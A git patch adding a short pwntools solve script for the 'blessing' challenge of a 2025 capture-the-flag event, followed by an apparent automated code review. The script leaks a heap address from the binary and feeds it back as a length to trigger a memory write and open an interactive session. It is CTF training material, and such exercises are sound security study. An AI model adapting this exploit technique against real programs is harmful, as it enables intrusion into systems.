From fcf3a9ee0fa661662e3a8b280e8c134cc7495270 Mon Sep 17 00:00:00 2001
From: jc
Date: Thu, 27 Mar 2025 23:54:35 +0300
Subject: [PATCH] solve script
---
 .../blessing/a.py | 21 +++++++++++++++++++
 1 file changed, 21 insertions(+)
 create mode 100644 cyberapocalypse_ctf_2025_tales_from_eldoria/blessing/a.py
diff --git a/cyberapocalypse_ctf_2025_tales_from_eldoria/blessing/a.py b/cyberapocalypse_ctf_2025_tales_from_eldoria/blessing/a.py
new file mode 100644
index 0000000..2b72992
--- /dev/null
+++ b/cyberapocalypse_ctf_2025_tales_from_eldoria/blessing/a.py
@@ -0,0 +1,21 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./blessing", checksec=False)
+r = process()
+
+# funcs
+s = lambda a: r.sendlineafter(b": ", a)
+
+# leak
+r.recvuntil(b"this: ")
+malloced = int(r.recv(14), 16)
+log.info("malloced: %#x", malloced)
+
+# buf
+r.recvuntil(b"song?")
+s(str(malloced+1).encode())
+s(b"0")
+
+r.interactive()
\ No newline at end of file
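Review bot: In the `# leak` step, `r.recv(14)` returns up to 14 bytes rather than exactly 14, so a short read makes `int(..., 16)` raise or parse a truncated address; `malloced = int(r.recvn(14), 16)` waits for the full field. The `# buf` step sends `malloced+1` as a decimal string without saying which behaviour of the binary this relies on; a comment such as `# length prompt: value is the leaked address + 1 (see write-up for why the program accepts it)` would let a reader follow the script without reverse-engineering the target. `target` is bound but never used, and `s = lambda ...` reads more clearly as a small `def` with a descriptive name. The file also ends without a trailing newline.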